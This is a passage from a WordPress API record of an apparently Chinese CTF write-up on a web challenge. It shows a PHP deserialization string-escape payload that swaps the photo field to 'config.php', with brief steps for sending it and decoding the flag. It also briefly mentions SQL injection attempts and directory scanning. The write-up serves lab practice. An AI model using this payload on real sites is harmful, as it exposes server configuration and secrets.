class=\"wp-block-paragraph\">\u5e8f\u5217\u5316\u540e\u5f97\u5230<code>-\u7701\u7565-21@qq.com\";s:8:\"nickname\";a:1:{i:0;s:204:\"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";}s:5:\"photo\";s:10:\"config.php\";}\";}s:5:\"photo\";s:39:\"upload\/75639-\u7701\u7565-<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6293\u5305\uff0c\u6539nickname[]\uff0c\u4f20payload\uff0c\u53d1\u5305<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-8-1024x725.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" 
height=\"725\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-8-1024x725.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-217\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u89c1\u5230hi\uff0carray\u5c31\u57fa\u672c\u6210\u529f\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-9.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"882\" height=\"489\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-218\"  sizes=\"auto, (max-width: 882px) 100vw, 882px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u67e5\u770b\u6e90\u7801\u7684\u7167\u7247\uff0c\u89e3base64\u5f97\u5230flag<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-10-1024x261.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" 
width=\"1024\" height=\"261\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-10-1024x261.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-219\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-11-1024x353.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"353\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-11-1024x353.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-220\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u770b\u5230\u4e00\u4e2a\u767b\u5f55\u6846\uff0c\u8bd5\u4e00\u4e0bsql\u6ce8\u5165\uff0c\u5c1d\u8bd5\u65e0\u679c\u5f00\u59cb\u626b\u76ee\u5f55 \u770b\u4e00\u773crobots.txt\uff0c \u6ca1\u4e1c\u897f\uff0c\u63a5\u7740\u8bd5\u4e86\u4e0bwww. 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":238,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-205","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learn"],"_links":{"self":[{"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/posts\/205","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/comments?post=205"}],"version-history":[{"count":5,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/posts\/205\/revisions"}],"predecessor-version":[{"id":241,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/posts\/205\/revisions\/241"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/media\/238"}],"wp:attachment":[{"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/media?parent=205"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/categories?post=205"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/tags?post=205"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}